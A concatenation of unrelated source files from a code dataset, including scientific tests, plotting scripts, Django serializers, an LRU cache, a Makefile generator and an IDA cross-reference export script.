h0, s0 = get_h0_s0(mol)
e0, c0 = scipy.linalg.eigh(h0, s0)
get_h1_etc = sfx2c1e_grad._gen_first_order_quantities(mol, e0, c0, x0)
R1 = get_h1_etc(0)[6][2]
self.assertAlmostEqual(abs(R1-R1t).max(), 0, 9)
def test_hfw(self):
with lib.light_speed(10) as c:
x2c_1 = sfx2c1e.SpinFreeX2C(mol1)
x2c_2 = sfx2c1e.SpinFreeX2C(mol2)
x2cobj = sfx2c1e.SpinFreeX2C(mol)
fh_ref = (x2c_1.get_hcore() - x2c_2.get_hcore()) / 0.0002 * lib.param.BOHR
fh = x2cobj.hcore_deriv_generator(deriv=1)
self.assertAlmostEqual(abs(fh(0)[2] - fh_ref).max(), 0, 7)
x2c_1.xuncontract = 0
x2c_2.xuncontract = 0
x2cobj.xuncontract =0
fh_ref = (x2c_1.get_hcore() - x2c_2.get_hcore()) / 0.0002 * lib.param.BOHR
fh = x2cobj.hcore_deriv_generator(deriv=1)
self.assertAlmostEqual(abs(fh(0)[2] - fh_ref).max(), 0, 7)
x2c_1.xuncontract = 1
x2c_2.xuncontract = 1
x2cobj.xuncontract =1
x2c_1.approx = 'ATOM1E'
x2c_2.approx = 'ATOM1E'
x2cobj.approx = 'ATOM1E'
fh_ref = (x2c_1.get_hcore() - x2c_2.get_hcore()) / 0.0002 * lib.param.BOHR
fh = x2cobj.hcore_deriv_generator(deriv=1)
self.assertAlmostEqual(abs(fh(0)[2] - fh_ref).max(), 0, 7)
if __name__ == "__main__":
print("Full Tests for sfx2c1e gradients")
unittest.main()
| 2.375 | 2 |
WordModel1.py | MengZhang0904/Learn_New_World | 0 | 12786789 | <filename>WordModel1.py<gh_stars>0
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import style
style.use('ggplot')
import seaborn as sns
from gensim.models import Word2Vec
def find_pct(word,age):
df = pd.read_csv('word_acq_pct1.csv')
row = df[df.definition2 == word]
pct = row.iloc[0][int(age)]
pct = pct*100
pct = int(pct)
return pct
def word_trajectory(df,word,age):
x = list(range(16,31))
print(x)
len(x)
y = np.array(df[df.definition2 == word])
y = y[0,1:]
type(y)
y =y.astype(float)
print(y)
len(y)
from matplotlib import style
style.use('ggplot')
plt.rcParams.update({'font.size': 13})
# set customized color for dots
color1 = ['dodgerblue' for x in range(16,31)]
idx = int(age) - 16
color1[idx] = 'crimson'
color2 = color1
ax = sns.regplot(x, y,logistic=True, marker = 'o',scatter_kws={'facecolors':color2,'s':65,'edgecolor':'none'},line_kws={'color':'y','linewidth':4.0})
plt.rcParams.update({'font.size': 13})
ax.set(xlabel='Age(Month)', ylabel='Proportion of Kids Knowing This Word')
save_name = 'static/plots/' + word + age + '.png'
print(save_name)
get_name = '../static/plots/' + word + age + '.png'
print(get_name)
plt.savefig(save_name)
return get_name
def same_mo(age,word):
file = 'dataset/w2v_' + age + '_mo_s1500.bin'
model = Word2Vec.load(file)
similar_w = model.most_similar(word)
words, score = zip(*similar_w)
return words
| 2.8125 | 3 |
tests/featuresInPortuguese/steps/contact_steps.py | Schveitzer/selenium-python-bdd-behave-example | 0 | 12786790 | <gh_stars>0
from behave import step
from nose.tools import assert_equal
from constants import system_messages, system_label
@step("eu clico no botão contato para abrir a página de contato")
def step_impl(context):
context.contact_page.contact_link().click()
context.helper.wait_for_element_is_visible(context.contact_page.contact_page_header())
@step("sistema exibe o título da página de contato")
def step_impl(context):
context.helper.wait_for_element_is_visible(context.contact_page.contact_page_header())
assert_equal(context.contact_page.contact_page_header().text, system_label.CUSTOMER_SERVICE_LABEL)
@step("eu envio uma mensagem com documento")
def step_impl(context):
content = {
"subject": "Customer service",
"message": "My message test",
"file": "test.pdf"
}
context.contact_page.send_menssage(content)
@step("sistema exibe mensagem de menssagem enviada com sucesso")
def step_impl(context):
context.helper.wait_for_element_is_visible(context.contact_page.sucess_message())
assert_equal(context.contact_page.sucess_message().text, system_messages.MESSAGE_SENT)
| 2.28125 | 2 |
tests/tests_verbs/test_order_by.py | fredzett/datastack | 0 | 12786791 | from datastack import DataTable, DataColumn, label, col, desc
import pytest
import numpy as np
def test_one():
tbl = (DataTable(a=(1,2,1,2,3,1), b=(4,5,6,3,2,1),c=(6,7,8,1,2,3))
.order_by(desc(label("b")))
)
exp = DataTable(a=(1,2,1,2,3,1), b=(6,5,4,3,2,1), c=(8,7,6,1,2,3))
assert tbl == exp
def test_one_str():
tbl = (DataTable(a=(1,2,1,2,3,1), b=(4,5,6,3,2,1),c=list("abcdef"))
.order_by(label("b"))
)
exp = DataTable(a=(1,3,2,1,2,1), b=(1,2,3,4,5,6), c=list("fedabc"))
assert tbl == exp
def test_two():
tbl = (DataTable(b=(4,5,2,3,2,1),c=(6,7,8,1,2,3),a=(1,2,1,2,3,1))
.order_by(label("b"), desc(label("a")), label("c"), )
)
exp = DataTable( b=(1,2,2,3,4,5), c=(3,2,8,1,6,7),a=(1,3,1,2,1,2))
assert tbl == exp
def test_two_asc():
data = {"col1": np.array((1, 2, 3, 4, 5, 4, 3, 2, 1)),
"col2": np.array(list("abcdeabcd")),
"col3": np.array((10, 11, 9, 8, 7, 2, 12, 100, 1))}
tbl = (DataTable.from_dict(data)
.order_by(label("col1"), label("col2"))
)
exp = DataTable.from_dict({'col1': np.array([1, 1, 2, 2, 3, 3, 4, 4, 5]),
'col2': np.array(['a', 'd', 'b', 'c', 'b', 'c', 'a', 'd', 'e']),
'col3': np.array([10, 1, 11, 100, 12, 9, 2, 8, 7])})
assert tbl == exp
def test_two_asc_desc():
data = {"col1": np.array((1, 2, 3, 4, 5, 4, 3, 2, 1)),
"col2": np.array(list("abcdeabcd")),
"col3": np.array((10, 11, 9, 8, 7, 2, 12, 100, 1))}
tbl = (DataTable.from_dict(data)
.order_by(label("col1"), desc(label("col2")))
)
exp = DataTable.from_dict({'col1': np.array([1, 1, 2, 2, 3, 3, 4, 4, 5]),
'col2': np.array(['d', 'a', 'c', 'b', 'c', 'b', 'd', 'a', 'e']),
'col3': np.array([1, 10, 100, 11, 9, 12, 8, 2, 7])})
assert tbl == exp
| 2.546875 | 3 |
python/fire_rs/demo_front_interpolation.py | arthur-bit-monnot/fire-rs-saop | 13 | 12786792 | <reponame>arthur-bit-monnot/fire-rs-saop
"""Test fire front interpolation"""
# Copyright (c) 2019, CNRS-LAAS
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
#
#
import itertools
import os
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm
import skimage.io
import skimage.draw
import skimage.measure
import scipy.interpolate
import fire_rs.geodata.environment as g_environment
import fire_rs.geodata.display as display
import fire_rs.rbf
from fire_rs.geodata.geo_data import GeoData
from fire_rs.firemodel.propagation import Environment, FirePropagation, TimedPoint
################################################################################
# World initialization
FIRERS_DATA_FOLDER = '/home/rbailonr/firers_data_porto'
FIRERS_DEM_DATA = os.path.join(FIRERS_DATA_FOLDER, 'dem')
FIRERS_WIND_DATA = os.path.join(FIRERS_DATA_FOLDER, 'wind')
FIRERS_LANDCOVER_DATA = os.path.join(FIRERS_DATA_FOLDER, 'landcover')
the_world = g_environment.World(elevation_path=FIRERS_DEM_DATA,
wind_path=FIRERS_WIND_DATA,
landcover_path=FIRERS_LANDCOVER_DATA, wind_mesh_resolution='fine',
landcover_to_fuel_remap=g_environment.SLOW_FUELMODEL_REMAP)
the_world.dem_wind_tile_split = 1
area = ((2776825.0 - 2500, 2776825.0 + 2500), (2212175.0 - 2500, 2212175.0 + 4500))
ignition = TimedPoint(2776825.0, 2212175.0, 0)
################################################################################
# Reference fire propagation
fire_env = Environment(area, 5., np.pi / 2, the_world)
fire_prop = FirePropagation(fire_env)
fire_prop.set_ignition_point(ignition)
propagation_end_time = 60 * 60 * 60
propagation_end_time = np.inf
fire_prop.propagate(propagation_end_time)
################################################################################
# Reference fire display
# Figure terrain + ignition contour + ignition point
gdd = display.GeoDataDisplay.pyplot_figure(
fire_env.raster.combine(fire_prop.ignitions().slice(["ignition"])), frame=(0., 0.))
gdd.draw_elevation_shade(with_colorbar=False, cmap=matplotlib.cm.terrain)
gdd.draw_wind_quiver()
gdd.draw_ignition_contour(with_labels=True, cmap=matplotlib.cm.plasma)
gdd.draw_ignition_points(ignition)
gdd.figure.show()
################################################################################
# Contour extraction
firemap = fire_prop.ignitions()
fire_image = np.ones(firemap.data.shape, dtype=np.float64) * np.NaN
firepoints = {}
# The ignition point is known
firepoints[fire_prop.ignitions().array_index((ignition[0], ignition[1]))] = ignition[2]
# Create contour with scikit-image
contours1 = skimage.measure.find_contours(firemap.data["ignition"], 21 * 60 * 60)
contours2 = skimage.measure.find_contours(firemap.data["ignition"], 20 * 60 * 60)
contours3 = skimage.measure.find_contours(firemap.data["ignition"], 22 * 60 * 60)
contours4 = skimage.measure.find_contours(firemap.data["ignition"], 40 * 60 * 60)
contours5 = skimage.measure.find_contours(firemap.data["ignition"], 41 * 60 * 60)
contours6 = skimage.measure.find_contours(firemap.data["ignition"], 42 * 60 * 60)
# Print contour as binary image
comp_cycle = itertools.cycle([lambda x, y: x < y, lambda x, y: x > y])
comp = next(comp_cycle)
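# The alternating comparison keeps only one half of each contour (the first half for
# one isochrone, the second half for the next) -- the assumed intent being to
# rasterize partial fire-front observations for the interpolation below.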
for i in [contours1, contours2, contours3, contours4, contours5, contours6]:
comp = next(comp_cycle)
for contour in i:
for pt_i in range(len(contour)):
if comp(pt_i, len(contour) / 2):
continue
if pt_i % 1 == 0:
rr, cc = skimage.draw.line(*np.asarray(contour[pt_i - 1], dtype=int),
*np.asarray(contour[pt_i], dtype=int))
fire_image[rr, cc] = firemap.data["ignition"][rr[0], cc[0]]
for r, c in zip(rr, cc):
firepoints[r, c] = firemap.data["ignition"][r, c]
fig = plt.figure()
ax = fig.gca()
imag = ax.imshow(fire_image / 60.)
fig.colorbar(imag, ax=ax, shrink=0.65, aspect=20, format="%d minutes")
fig.show()
################################################################################
# Interpolate contour
x, y = list(zip(*firepoints.keys()))
z = tuple(firepoints.values())
function = 'thin_plate'
# function = 'linear'
# function = 'multiquadric'
# function = 'cubic'
# --function = lambda a: np.sin(a)
# Wildland fire modeling with an Eulerian level set method and automated calibration
# might give a clue of which kind of kernel function to use
zfun_smooth_rbf = fire_rs.rbf.Rbf(x, y, z, function=function, epsilon=0.1,
smooth=0) # default smooth=0 for interpolation
xi = np.linspace(0, firemap.data.shape[0] - 1, firemap.data.shape[0])
yi = np.linspace(0, firemap.data.shape[1] - 1, firemap.data.shape[1])
meshgrid = np.meshgrid(xi, yi, indexing="ij")
z_dense_smooth_rbf = zfun_smooth_rbf(
*[x.flatten() for x in meshgrid]) # not really a function, but a callable class instance
z_dense_smooth_rbf = z_dense_smooth_rbf.reshape(len(xi), len(yi))
################################################################################
# Display interpolation
fig = plt.figure()
ax = fig.gca()
levels = list(range(0, 70 * 60 * 60, 10 * 60 * 60))
ax.imshow(fire_image)
c1 = ax.contour(z_dense_smooth_rbf, levels=levels)
ax.clabel(c1)
c2 = ax.contour(firemap.data["ignition"], levels=levels, alpha=0.6)
# ax.imshow(z_dense_smooth_rbf - firemap.data["ignition"])
ax.clabel(c2)
ax.imshow(fire_image)
fig.show()
################################################################################
# Display error
fig = plt.figure()
ax = fig.gca()
levels = list(range(0, 70 * 60, 10 * 60))
diferencia = z_dense_smooth_rbf - firemap.data["ignition"]
# ax.imshow(firemap.data["ignition"])
# 150 min is 200m for wind 5km/h in wind direction
diff_image = ax.imshow(diferencia / 60., cmap=matplotlib.cm.seismic, vmin=-150, vmax=150)
cb = fig.colorbar(diff_image, ax=ax, shrink=0.65, aspect=20, format="%d minutes")
cb.set_label("Interpolation error")
ax.imshow(fire_image, cmap=matplotlib.cm.cool)
c2 = ax.contour(firemap.data["ignition"] / 60., levels=levels, cmap=matplotlib.cm.cool)
ax.clabel(c2)
# ax.imshow(fire_image)
fig.show()
################################################################################
# In 3D
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure()
ax = fig.add_subplot(121, projection='3d')
ax.plot_surface(*meshgrid, z_dense_smooth_rbf, color="blue")
fig.show()
ax = fig.add_subplot(122, projection='3d')
ax.plot_surface(*meshgrid, firemap.data["ignition"], color="red")
fig.show()
print("THE END")
| 1.203125 | 1 |
back_end/mlh/apps/headlines/serializers.py | 22014471/malonghui_Django | 1 | 12786793 | <gh_stars>1-10
import logging
from rest_framework import serializers
from activity.models import Activity
from headlines.models import HeadlinesCategory, HeadlinesNews, NewsComment, UserAttention, NewsCollection
from questions.models import Question, Tag
from talks.models import Talks
from users.models import User
class UserSerializer(serializers.ModelSerializer):
"""
    User serializer 1
"""
class Meta:
model = User
fields = ("id", "username", "avatar")
class NewsSerializer(serializers.ModelSerializer):
"""
    News serializer
"""
class Meta:
model = HeadlinesNews
fields = ("id", "title", "create_time")
class NewsCollectionSerializer(serializers.ModelSerializer):
"""
    News collection serializer
"""
user = UserSerializer()
class Meta:
model = NewsCollection
fields = ("user",)
class QuestionSerializer(serializers.ModelSerializer):
"""
    Serializer for the author Q&A ranking on the headline detail page
"""
class Meta:
model = Question
fields = ('id', 'title', 'update_time')
class AuthorAttentionSerializer(serializers.ModelSerializer):
"""
    Author follower serializer
"""
user = UserSerializer()
class Meta:
model = User
fields = ("id", 'user')
class HeadlineUserSerializer(serializers.ModelSerializer):
"""
    User serializer 2 (user news + user followers)
"""
news = NewsSerializer(many=True)
attention = AuthorAttentionSerializer(many=True)
class Meta:
model = User
fields = ("id", "username", "avatar", 'news', 'attention')
class HeadlineAuthorSerializer(serializers.ModelSerializer):
"""
    User serializer 3 (user followers)
"""
attention = AuthorAttentionSerializer(many=True)
class Meta:
model = User
fields = ("id", "username", "avatar", 'attention')
class HeadlinesCategorySerializer(serializers.ModelSerializer):
"""
    Headline category serializer
"""
class Meta:
model = HeadlinesCategory
fields = ('id', 'name')
class HeadlinesNewsSerializer(serializers.ModelSerializer):
"""
    Headline news list serializer
"""
author = HeadlineAuthorSerializer()
class Meta:
model = HeadlinesNews
fields = ('id', 'title', 'author', 'create_time', 'content', "clicks")
class HeadlinesDetailSerializer(serializers.ModelSerializer):
"""
    Headline news detail serializer
"""
author = HeadlineUserSerializer()
collected = NewsCollectionSerializer(many=True)
class Meta:
model = HeadlinesNews
fields = ('id', 'title', 'author', 'collected', 'create_time', 'content', "comment_count")
class CommentsSerializer(serializers.ModelSerializer):
"""
    News comment serializer
"""
user = UserSerializer()
class Meta:
model = NewsComment
fields = ('id', 'user', 'content')
class HeadlinesCommentsSerializer(serializers.ModelSerializer):
"""
    Comment serializer for the headline news detail page
"""
user = UserSerializer()
child = CommentsSerializer(many=True)
class Meta:
model = NewsComment
fields = ('id', 'user', 'content', 'child', 'parent')
class HeadlinesCommentAddSerializer(serializers.ModelSerializer):
"""
    Comment creation serializer
"""
class Meta:
model = NewsComment
fields = ('id', 'news', 'user', 'content', 'parent')
def create(self, validated_data):
"""
        Create a comment
"""
news= validated_data['news']
news.comment_count += 1
news.save()
return super().create(validated_data)
class HeadlinesQuestionSerializer(serializers.ModelSerializer):
"""
    Q&A ranking serializer for the headlines home page
"""
author = UserSerializer()
class Meta:
model = Question
fields = ('id', 'author', 'title', 'update_time')
class HeadlinesActivitiesSerializer(serializers.ModelSerializer):
"""
    Popular activity ranking serializer
"""
class Meta:
model = Activity
fields = ('id', 'cover', 'city', 'act_name', 'start_time')
class HeadlinesTalksSerializer(serializers.ModelSerializer):
"""
    Talks ranking serializer for the detail page
"""
class Meta:
model = Talks
fields = ('id', 'content')
class HeadlinesHotsSerializer(serializers.ModelSerializer):
"""
    Hot headlines ranking serializer for the detail page
"""
class Meta:
model = HeadlinesNews
fields = ('id', 'title')
class HeadlinesUserAttention(serializers.ModelSerializer):
"""
    Serializer for a user following an author
"""
class Meta:
model = UserAttention
fields = ('user', 'author')
def create(self, validated_data):
"""
        Create and save a follow relation
"""
user = validated_data['user']
author = validated_data['author']
        # fans_list = author.attention.all()   # the author's followers (fans)
        # user_attention = user.fun.all()     # the user's follow (attention) list
        # print(fans_list)
        # print(user_attention)
        # # check whether this author is already followed
        # for fan in fans_list:
        #     if user == fan.user:
        #         raise serializers.ValidationError('Already following this user, please do not add again')
        # check that the author exists
        if not author:
            raise serializers.ValidationError('No such author')
        # check that the author is not the user themselves
        if author.id == user.id:
            raise serializers.ValidationError('You cannot follow yourself')
return super().create(validated_data)
class HeadlinesUserCollectionSerializer(serializers.ModelSerializer):
"""
    User news collection serializer
"""
class Meta:
model = NewsCollection
fields = ('user', 'news')
def create(self, validated_data):
"""
        Create and save a news collection entry
"""
user = validated_data['user']
news = validated_data['news']
        # check that the news item exists
        if not news:
            raise serializers.ValidationError('No such news item')
        # check that the user is not collecting their own news
        if news.author == user:
            raise serializers.ValidationError('You cannot collect your own news')
return super().create(validated_data)
class HeadlinesNewsAddSerializer(serializers.ModelSerializer):
"""
    News publishing serializer
"""
class Meta:
model = HeadlinesNews
fields = ("title", 'category', 'author', 'content')
| 2.40625 | 2 |
paralleldomain/utilities/lazy_load_cache.py | parallel-domain/pd-sdk | 10 | 12786794 | import collections
import logging
import os
import re
from sys import getsizeof
from threading import Event, RLock
from typing import Any, Callable, Dict, Hashable, Tuple, TypeVar, Union
import numpy as np
from cachetools import Cache
from humanize import naturalsize
CachedItemType = TypeVar("CachedItemType")
logger = logging.getLogger(__name__)
SHOW_CACHE_LOGS = os.environ.get("SHOW_CACHE_LOGS", False)
class CacheFullException(Exception):
...
class CacheEmptyException(Exception):
...
class LazyLoadCache(Cache):
"""Least Recently Used (LRU) cache implementation."""
_marker = object()
def __init__(self, cache_name: str = "Default pd-sdk Cache", cache_max_size: str = "1GiB"):
self.cache_name = cache_name
self._maximum_allowed_bytes: int = byte_str_to_bytes(byte_str=cache_max_size)
logger.info(
f"Initializing LazyLoadCache '{cache_name}' with available "
f"space of {naturalsize(self._maximum_allowed_bytes)}."
)
self._key_load_locks: Dict[Hashable, Tuple[RLock, Event]] = dict()
self._create_key_lock = RLock()
Cache.__init__(self, maxsize=self._maximum_allowed_bytes, getsizeof=LazyLoadCache.getsizeof)
self.__order = collections.OrderedDict()
def get_item(self, key: Hashable, loader: Callable[[], CachedItemType]) -> CachedItemType:
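        # Per-key lock plus a re-check under the lock (double-checked pattern via
        # _get_locks): only one thread runs `loader` for a given key, while lookups
        # of other keys can proceed concurrently.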
key_lock, wait_event = self._get_locks(key=key)
with key_lock:
if key not in self:
if SHOW_CACHE_LOGS:
logger.debug(f"load key {key} to cache")
value = loader()
try:
self[key] = value
except CacheFullException as e:
logger.warning(f"Cant store {key} in Cache since no more space is left! {str(e)}")
return value
wait_event.set()
return value
return self[key]
def __missing__(self, key):
raise KeyError(key)
def __getitem__(self, key: Hashable, cache_getitem: Callable[[Cache, Hashable], Any] = Cache.__getitem__):
value = cache_getitem(self, key)
if key in self: # __missing__ may not store item
self.__update(key)
return value
def __setitem__(self, key: Hashable, value, cache_setitem=Cache.__setitem__):
self._custom_set_item(key, value)
self.__update(key)
def _get_locks(self, key: Hashable) -> Tuple[RLock, Event]:
if key not in self._key_load_locks:
with self._create_key_lock:
if key not in self._key_load_locks:
self._key_load_locks[key] = (RLock(), Event())
return self._key_load_locks[key]
def _custom_set_item(self, key, value):
size = self.getsizeof(value)
if SHOW_CACHE_LOGS:
logger.debug(f"add item {key} with size {naturalsize(size)}")
if size > self.maxsize:
raise ValueError("value too large")
if key not in self._Cache__data or self._Cache__size[key] < size:
self.free_space_for_n_bytes(n_bytes=size)
if key in self._Cache__data:
diffsize = size - self._Cache__size[key]
else:
diffsize = size
self._Cache__data[key] = value
self._Cache__size[key] = size
self._Cache__currsize += diffsize
def __delitem__(self, key: Hashable, cache_delitem=Cache.__delitem__):
key_lock, wait_event = self._get_locks(key=key)
with key_lock:
if wait_event.is_set():
if SHOW_CACHE_LOGS:
logger.debug(f"delete {key} from cache")
cache_delitem(self, key)
del self.__order[key]
wait_event.clear()
def free_space_for_n_bytes(self, n_bytes: Union[float, int]):
try:
while n_bytes > self.free_space:
self.popitem()
except CacheEmptyException:
if n_bytes > self.free_space:
raise CacheFullException(
f"Cache is already empty but there is no more space left tho store {n_bytes}B!"
)
@property
def maxsize(self) -> int:
"""The maximum size of the cache."""
return self._maximum_allowed_bytes
@maxsize.setter
def maxsize(self, value: Union[str, int]):
if isinstance(value, int):
self._maximum_allowed_bytes = value
elif isinstance(value, str):
self._maximum_allowed_bytes: int = byte_str_to_bytes(byte_str=value)
else:
raise ValueError(f"invalid type for maxsite {type(value)}! Has to be int or str.")
logger.info(f"Changed '{self.cache_name}' available space to {naturalsize(self._maximum_allowed_bytes)}.")
# If size got smaller make sure cache is cleared up
self.free_space_for_n_bytes(n_bytes=0)
@property
def currsize(self) -> int:
"""The current size of the cache."""
return int(self._Cache__currsize)
@property
def free_space(self) -> int:
"""The maximum size of the caches free space."""
remaining_allowed_space = self.maxsize - self.currsize
return remaining_allowed_space
def popitem(self):
"""Remove and return the `(key, value)` pair least recently used."""
try:
it = iter(list(self.__order.keys()))
key = next(it)
except StopIteration:
raise CacheEmptyException("%s is empty" % type(self).__name__)
else:
del self[key]
def pop(self, key, default=_marker):
key_lock, wait_event = self._get_locks(key=key)
with key_lock:
if key in self:
value = self[key]
del self[key]
elif default is LazyLoadCache._marker:
raise KeyError(key)
else:
value = default
return value
def clear(self):
"D.clear() -> None. Remove all items from D."
try:
while True:
self.popitem()
except CacheEmptyException:
pass
def __update(self, key):
try:
self.__order.move_to_end(key)
except KeyError:
self.__order[key] = None
@staticmethod
def getsizeof(value, seen=None):
"""Return the size of a cache element's value."""
# handle recursion
if seen is None:
seen = set()
obj_id = id(value)
if obj_id in seen:
return 0
seen.add(obj_id)
size = getsizeof(value)
if hasattr(value, "__dict__"):
pass
# for k, v in value.__dict__.items():
# size += getsizeof(v)
elif isinstance(value, list):
for i in value:
size += LazyLoadCache.getsizeof(i, seen)
elif isinstance(value, dict):
for k, v in value.items():
size += LazyLoadCache.getsizeof(v, seen)
elif isinstance(value, np.ndarray):
size = value.nbytes
return size
def byte_str_to_bytes(byte_str: str) -> int:
split_numbers_and_letters = re.match(r"([.0-9]+)([kKMGTPEZY]*)([i]*)([bB]+)", byte_str.replace(" ", ""), re.I)
powers = {"": 0, "k": 1, "m": 2, "g": 3, "t": 4, "p": 5, "e": 6, "z": 7, "y": 8}
if split_numbers_and_letters is None:
raise ValueError(
f"Invalid byte string format {byte_str}. `byte_str` has to be an integer string followed by a byte unit."
)
number, power_letter, base_letter, bites_or_bytes = split_numbers_and_letters.groups()
bit_factor = 1 if bites_or_bytes == "B" else 1 / 8
base = 1024 if base_letter == "i" else 1000
power = powers[power_letter.lower()]
number = float(number)
total_bits = number * base**power * bit_factor
return int(total_bits)
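# Illustrative conversions, following the regex and factors above:
#   byte_str_to_bytes("1GiB") == 1024**3
#   byte_str_to_bytes("500MB") == 500 * 1000**2
#   byte_str_to_bytes("8kb") == 1000   # kilobits -> bytes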
cache_max_ram_usage_factor = float(os.environ.get("CACHE_MAX_USAGE_FACTOR", 0.1)) # 10% free space max
cache_max_size = os.environ.get("CACHE_MAX_BYTES", "1GiB")
if "CACHE_MAX_USAGE_FACTOR" in os.environ:
logger.warning(
"CACHE_MAX_USAGE_FACTOR is not longer supported! Use CACHE_MAX_BYTES instead to set a cache size in bytes!"
)
LAZY_LOAD_CACHE = LazyLoadCache(cache_max_size=cache_max_size)
| 2.125 | 2 |
fmojinja/awk/makefile/pdb_reformer.py | Taro-Imahiro/fmojinja | 0 | 12786795 | from ...mixin import TemplateRendererMixin
from ...__version__ import get_version
from argparse import ArgumentParser
class PdbReformer(TemplateRendererMixin):
@classmethod
def template(cls) -> str:
return f"# Generated by fmojinja version {get_version()}" + """
PREFIX := {{ prefix }}
PDB :={% for path in input_pdbs %} {{ path }}{% endfor %}
CHAIN_STARTS :={% for seq_id in chain_starts %} {{ seq_id }}{% endfor %}
FORMATTED_PDB := $(addsuffix .pdb, $(addprefix $(PREFIX), $(basename $(notdir $(PDB)))))
.PHONY: run
run: gen $(FORMATTED_PDB)
.PHONY: gen
gen: $(PREFIX) $(PREFIX)reformat.awk
$(PREFIX):
\tmkdir $(PREFIX)
$(PREFIX)reformat.awk:
\tpython -m fmojinja.awk pdb_reformer -c $(CHAIN_STARTS) > $@
define expr
$(PREFIX)$(basename $(notdir $(1))).pdb: $(1)
\tawk -f $(PREFIX)reformat.awk $(1) > $(PREFIX)$(basename $(notdir $(1))).pdb
endef
$(foreach i, $(PDB), $(eval $(call expr, $(i))))
.PHONY: clean
clean:
\trm $(PREFIX)*
"""
@classmethod
def set_arguments(cls, p: ArgumentParser) -> ArgumentParser:
p = super(PdbReformer, cls).set_arguments(p)
p.add_argument("-P", "--prefix", default="reformat_pdb/")
p.add_argument("-c", "--chain-starts", nargs="*", default=[])
p.add_argument("-i", "--input-pdbs", required=True, nargs="+")
return p
| 2.25 | 2 |
services/api/__init__.py | flaviohenriqu/chemical-image-generation | 0 | 12786796 | <gh_stars>0
# services/__init__.py
import os
import connexion
import logging
def create_app(script_info=None):
# instantiate the app
con_app = connexion.FlaskApp(__name__, specification_dir='docs/')
con_app.add_api('api.yaml', options={'swagger_url': '/docs'})
# set config
app_settings = os.getenv('APP_SETTINGS')
con_app.app.config.from_object(app_settings)
return con_app
| 1.945313 | 2 |
viz/all-crossrefs-idb.py | cloakware-ctf/idascripts | 11 | 12786797 | <gh_stars>10-100
# Copyright 2016-2018 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import idascript
import sys
import os
import traceback
import idaapi
import logging
import sark
import json
# [ { label: 'label1', edges: { ea: { name: 'name', xrefs_from : { ... } } } },
# ...
# ]
logger = logging.getLogger(__name__)
if not logger.handlers:
handler = logging.StreamHandler(stream=sys.stdout)
logger.addHandler(handler)
try:
Wait()
all_functions = dict()
# all functions
for seg_ea in Segments():
for function_ea in Functions(seg_ea, SegEnd(seg_ea)):
all_functions.update({ str(function_ea): { 'name': GetFunctionName(function_ea) }})
# add cross-refs
unknown_functions = {};
for ea in all_functions.keys():
this_function = sark.Function(int(ea))
xrefs_from = dict()
for xref in this_function.xrefs_from:
if not xref.iscode:
continue
try:
xrefs_from.update({ str(xref.to) : sark.Function(xref.to).ea})
except sark.exceptions.SarkNoFunction:
print "unknown xref target function at 0x%x" % xref.to
# add unknown functions
unknown_functions.update({ str(xref.to): { 'name': 'unknown' , 'xrefs_from': {} }})
xrefs_from.update({ str(xref.to) : xref.to})
all_functions.get(ea).update({ 'xrefs_from': xrefs_from })
all_functions.update(unknown_functions);
# collect all exports in a dict by 'ea' , remove them from above all-functions dict
all_exports = dict()
for index, ordinal, ea, name in idautils.Entries():
if all_functions.get(str(ea)) is not None:
all_exports.update({ str(ea): all_functions.pop(str(ea)) })
# collect all imports in a dict by 'ea' , remove them from above all-functions dict
all_imports = dict()
for ea in all_functions.keys():
seg_name = idc.SegName(int(ea))
if seg_name in ['extern']:
all_imports.update({ea: all_functions.pop(ea)})
groups_of_functions = []
groups_of_functions.append({
'label': 'exports',
'edges': all_exports
})
groups_of_functions.append({
'label': 'others',
'edges': all_functions
})
groups_of_functions.append({
'label': 'imports',
'edges': all_imports
})
name, extension = os.path.splitext(idaapi.get_input_file_path())
fd_out = open(name+'_allxrefs.json', 'w')
fd_out.write(json.dumps(groups_of_functions, indent=2, sort_keys=False))
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error("Uncaught exception", exc_info=(exc_type, exc_value, exc_traceback))
idascript.exit()
| 1.867188 | 2 |
tests/test_files_process_save.py | efratkohen/Project | 1 | 12786798 | <reponame>efratkohen/Project<filename>tests/test_files_process_save.py
from files_process_save import *
import clean_data_svi as cds
import pathlib
import pytest
def test_valid_input():
fname = pathlib.Path(__file__)
q = check_file(fname)
assert fname == q
def test_str_input():
q = check_file(__file__)
assert pathlib.Path(__file__) == q
def test_missing_file():
fname = pathlib.Path('test.fd')
with pytest.raises(ValueError):
check_file(fname)
def test_wrong_input_type():
fname = 2
with pytest.raises(TypeError):
